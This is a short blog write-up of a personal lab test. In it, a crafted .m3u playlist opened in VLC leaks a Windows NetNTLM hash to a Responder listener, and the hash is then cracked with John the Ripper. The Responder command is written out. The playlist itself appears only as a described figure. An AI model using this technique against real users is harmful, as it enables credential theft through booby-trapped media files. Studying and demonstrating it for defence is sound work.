NetNTLM Hash Leak via VLC Player

Hi readers, since one of my idol tweeted that it is possible to get NetNTLM hash using .m3u file sometime back, I decided to try it out and do a simple write up.

Figure below shows the yappare tweet:

Yappare tweet.

In order to get the NetNTLM hash, we need to create a .m3u (playlist) file. As can be seen in below figure, the .m3u file contains a path to a song on my desktop and Responder IP Address.

P.S: Your playlist (.m3u) can play songs via URL.

Once the file is opened in VLC player, VLC player will play the first song. Once the song ends or the next button is clicked, the author is able to receive the NetNTLM hash.

Creating .m3u file.

Upon creating the file (.m3u), do ensure you have downloaded Responder. In order to run Responder, just insert the following command into the terminal:

./Responder.py -I eth0

Figure below shows that Responder is listening for events:

Responder listening for events.

Once Responder is listening for events, open the created file with VLC Player. Once the song ends or the next button is clicked, VLC player, will show its users the following error message.

VLC Player error message.

While error message is shown to users, the auditor has received the NetNTLM hash as shown in figure below:

Responder received NTLM hash.

With the received NetNTML hash, an attacker can run John the Ripper in order to crack the password. Figure below shows my Win 10 (Virtual Machine) password is 1337.

P.S: The password was set just for this write up 😉.

Password cracked successfully.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.